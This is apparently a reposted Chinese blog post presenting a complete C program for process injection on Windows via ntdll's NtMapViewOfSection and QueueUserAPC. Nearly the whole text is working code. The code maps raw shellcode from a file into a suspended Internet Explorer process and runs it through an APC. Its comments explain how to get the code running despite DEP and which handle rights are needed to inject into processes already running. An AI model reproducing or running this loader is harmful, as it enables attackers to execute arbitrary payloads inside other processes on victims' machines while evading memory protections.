• NtMapViewOfSection注入



    新的注入方式:利用 ntdll 导出的 NtMapViewOfSection(它不在 Win32 API 中公开,但等价的 ZwMapViewOfSection 在 WDK 中是有文档的)把一个区段直接映射进远程进程的地址空间,再用 QueueUserAPC 让远程线程执行它。整个过程工作在用户模式下,不需要管理员权限之类的特殊条件——前提是注入者已经持有目标进程和线程的足够权限的句柄(下面的例子通过以 CREATE_SUSPENDED 方式创建子进程拿到完全访问的句柄)。注意:示例中区段以 PAGE_READONLY 映射,在开启 DEP 的目标进程里该视图不可执行,APC 会触发访问违例;要在 DEP 下执行,需要以可执行保护(PAGE_EXECUTE_READ 区段 + FILE_MAP_EXECUTE 视图)创建并映射区段。

    #define _WIN32_WINNT 0x0400
    #include <windows.h>
    
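    /* NTSTATUS is not exposed by <windows.h>; mirror the ntdef.h definitions. */
    typedef LONG NTSTATUS, *PNTSTATUS;
    #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

    /* SECTION_INHERIT from ntdef.h: whether a view is inherited by child
     * processes of the target (ViewShare) or not (ViewUnmap). */
    typedef enum _SECTION_INHERIT
    {
        ViewShare = 1,
        ViewUnmap = 2
    } SECTION_INHERIT;

    /*
     * Prototype of ntdll!NtMapViewOfSection, matching the documented
     * ZwMapViewOfSection signature:
     *   SectionHandle, ProcessHandle, BaseAddress (in/out), ZeroBits,
     *   CommitSize, SectionOffset (in/out, optional), ViewSize (in/out),
     *   InheritDisposition, AllocationType, Win32Protect.
     * BaseAddress and ViewSize are declared as pointers so the compiler
     * rejects mismatched out-parameters, and ZeroBits is the pointer-sized
     * ULONG_PTR rather than ULONG so the prototype is also right for 64-bit
     * builds. NTAPI is __stdcall on x86 and empty on x64.
     */
    typedef NTSTATUS (NTAPI *func_NtMapViewOfSection)(
        HANDLE          SectionHandle,
        HANDLE          ProcessHandle,
        PVOID          *BaseAddress,
        ULONG_PTR       ZeroBits,
        SIZE_T          CommitSize,
        PLARGE_INTEGER  SectionOffset,
        PSIZE_T         ViewSize,
        SECTION_INHERIT InheritDisposition,
        ULONG           AllocationType,
        ULONG           Win32Protect);

    /* Resolved from ntdll.dll at run time (see WinMain); NULL until then. */
    func_NtMapViewOfSection NtMapViewOfSection = NULL;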
    
    
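    /*
     * MyMapViewOfFileEx - MapViewOfFileEx for an arbitrary target process.
     *
     * Takes the MapViewOfFileEx parameters plus hProcess, the process whose
     * address space receives the view. Win32 only maps views into the
     * caller, so this goes straight to ntdll!NtMapViewOfSection.
     *
     * hProcess             - handle to the target (needs PROCESS_VM_OPERATION)
     * hFileMappingObject   - section handle from CreateFileMapping
     * dwDesiredAccess      - FILE_MAP_READ / FILE_MAP_WRITE / FILE_MAP_COPY,
     *                        optionally FILE_MAP_EXECUTE where the SDK has it
     * dwFileOffsetHigh/Low - offset of the view within the section
     * dwNumberOfBytesToMap - view length; 0 maps through the end of the section
     * lpBaseAddress        - preferred base, or NULL to let the kernel choose
     *
     * Returns the base of the view in hProcess's address space (not
     * dereferenceable by the caller unless hProcess is the current process),
     * or NULL on failure. The NTSTATUS is not propagated to GetLastError.
     */
    LPVOID NTAPI MyMapViewOfFileEx(HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,
    DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress)
    {
        NTSTATUS Status;
        LARGE_INTEGER SectionOffset;
        SIZE_T ViewSize;   /* SIZE_T, not ULONG: the kernel writes a pointer-sized value through PSIZE_T */
        ULONG Protect;
        PVOID ViewBase;

        /* The function pointer is filled in by WinMain; refuse to run before that. */
        if (NtMapViewOfSection == NULL)
        {
            return NULL;
        }

        SectionOffset.LowPart = dwFileOffsetLow;
        SectionOffset.HighPart = dwFileOffsetHigh;

        /* In/out values: requested base and size going in, actual ones coming back. */
        ViewBase = lpBaseAddress;
        ViewSize = dwNumberOfBytesToMap;

        /* FILE_MAP_* access -> PAGE_* protection. FILE_MAP_WRITE takes
         * precedence over FILE_MAP_READ, which takes precedence over
         * FILE_MAP_COPY (copy-on-write). */
        if (dwDesiredAccess & FILE_MAP_WRITE)
        {
            Protect = PAGE_READWRITE;
        }
        else if (dwDesiredAccess & FILE_MAP_READ)
        {
            Protect = PAGE_READONLY;
        }
        else if (dwDesiredAccess & FILE_MAP_COPY)
        {
            Protect = PAGE_WRITECOPY;
        }
        else
        {
            Protect = PAGE_NOACCESS;
        }

    #ifdef FILE_MAP_EXECUTE
        /* Without FILE_MAP_EXECUTE the view is never executable, so code
         * placed in it faults on a DEP-enabled target. The execute
         * protections are only granted if the section itself was created
         * with a PAGE_EXECUTE_* protection. */
        if (dwDesiredAccess & FILE_MAP_EXECUTE)
        {
            if (Protect == PAGE_READWRITE)
            {
                Protect = PAGE_EXECUTE_READWRITE;
            }
            else if (Protect == PAGE_READONLY)
            {
                Protect = PAGE_EXECUTE_READ;
            }
            else if (Protect == PAGE_WRITECOPY)
            {
                Protect = PAGE_EXECUTE_WRITECOPY;
            }
        }
    #endif

        Status = NtMapViewOfSection(hFileMappingObject,
                                    hProcess,
                                    &ViewBase,
                                    0,              /* ZeroBits: no alignment constraint */
                                    0,              /* CommitSize: nothing committed up front */
                                    &SectionOffset,
                                    &ViewSize,
                                    ViewShare,      /* children of hProcess inherit the view */
                                    0,              /* AllocationType: none */
                                    Protect);
        if (!NT_SUCCESS(Status))
        {
            return NULL;
        }

        /* Base address of the view inside hProcess. */
        return ViewBase;
    }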
    
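    /*
     * Entry point: maps the contents of C:\shellcode.txt into a freshly
     * created, suspended iexplore.exe and queues a user-mode APC at the
     * view's base, so the bytes run when the main thread is resumed (the
     * APC is delivered before the thread executes its first user-mode
     * instruction).
     *
     * Things a practitioner should keep in mind:
     *  - The file must hold raw, position-independent machine code for the
     *    target's architecture. It is invoked as a PAPCFUNC (one ULONG_PTR
     *    argument, stdcall on x86) and must return cleanly.
     *  - A PAGE_READONLY view is not executable on a DEP-enabled target and
     *    the APC faults there. When the SDK provides FILE_MAP_EXECUTE the
     *    code below opens the file for execute, creates a PAGE_EXECUTE_READ
     *    section and asks for an executable view; MyMapViewOfFileEx must
     *    translate FILE_MAP_EXECUTE into a PAGE_EXECUTE_* protection for
     *    that request to take effect.
     *  - No special privilege is needed only because the target is a child
     *    this process created (full-access handles from CreateProcess).
     *    Injecting into an existing process needs PROCESS_VM_OPERATION on
     *    the process and THREAD_SET_CONTEXT on the thread.
     *
     * Returns 0 on success, 1 if any step failed; on failure the suspended
     * child is terminated so it does not linger.
     */
    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    {
        HMODULE hDll;
        HANDLE hFile = INVALID_HANDLE_VALUE;
        HANDLE hMappedFile = NULL;
        STARTUPINFO st;
        PROCESS_INFORMATION pi;
        LPVOID MappedFile = NULL;
        DWORD fileAccess;
        DWORD sectionProtect;
        DWORD mapAccess;
        int rc = 1;

        (void)hInstance;
        (void)hPrevInstance;
        (void)lpCmdLine;
        (void)nCmdShow;

        ZeroMemory(&st, sizeof(st));
        st.cb = sizeof(STARTUPINFO);
        ZeroMemory(&pi, sizeof(pi));

        /* ntdll.dll is mapped into every process, so a module handle is enough;
         * no LoadLibrary reference needs to be taken. */
        hDll = GetModuleHandle("ntdll.dll");
        if (hDll == NULL)
        {
            return rc;
        }
        NtMapViewOfSection = (func_NtMapViewOfSection)GetProcAddress(hDll, "NtMapViewOfSection");
        if (NtMapViewOfSection == NULL)
        {
            return rc;
        }

    #ifdef FILE_MAP_EXECUTE
        /* Executable view so the APC can run under DEP. */
        fileAccess     = GENERIC_READ | GENERIC_EXECUTE;
        sectionProtect = PAGE_EXECUTE_READ;
        mapAccess      = FILE_MAP_READ | FILE_MAP_EXECUTE;
    #else
        /* Older SDK: read-only view as in the original listing; only runs
         * where DEP is off for the target. */
        fileAccess     = GENERIC_READ;
        sectionProtect = PAGE_READONLY;
        mapAccess      = FILE_MAP_READ;
    #endif

        /* The payload: raw machine code, whatever the operator wants to run. */
        hFile = CreateFile("C:\\shellcode.txt", fileAccess, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile == INVALID_HANDLE_VALUE)
        {
            goto cleanup;
        }
        hMappedFile = CreateFileMapping(hFile, NULL, sectionProtect, 0, 0, NULL);
        if (hMappedFile == NULL)
        {
            goto cleanup;
        }

        /* Start the target suspended: its main thread has not run any
         * user-mode code yet, so the APC queued below is the first thing it
         * executes. The path comes from a German-locale install ("Programme");
         * adjust for the machine at hand. */
        if (!CreateProcess("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE,
                           CREATE_SUSPENDED, NULL, NULL, &st, &pi))
        {
            goto cleanup;
        }

        /* Map the section into the child; the address returned is only
         * meaningful in the child's address space. */
        MappedFile = MyMapViewOfFileEx(pi.hProcess, hMappedFile, mapAccess, 0, 0, 0, NULL);
        if (MappedFile == NULL)
        {
            goto cleanup;
        }

        /* Queue the view's base as the APC routine; it is delivered as soon
         * as the thread is resumed. Never queue a NULL routine. */
        if (!QueueUserAPC((PAPCFUNC)MappedFile, pi.hThread, 0))
        {
            goto cleanup;
        }
        ResumeThread(pi.hThread);
        rc = 0;

    cleanup:
        /* A suspended child that will never be resumed must not be left behind. */
        if (rc != 0 && pi.hProcess != NULL)
        {
            TerminateProcess(pi.hProcess, 1);
        }
        if (pi.hThread != NULL)
        {
            CloseHandle(pi.hThread);
        }
        if (pi.hProcess != NULL)
        {
            CloseHandle(pi.hProcess);
        }
        if (hMappedFile != NULL)
        {
            CloseHandle(hMappedFile);
        }
        if (hFile != INVALID_HANDLE_VALUE)
        {
            CloseHandle(hFile);
        }
        return rc;
    }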


     

  • 原文地址:https://www.cnblogs.com/hgy413/p/3693479.html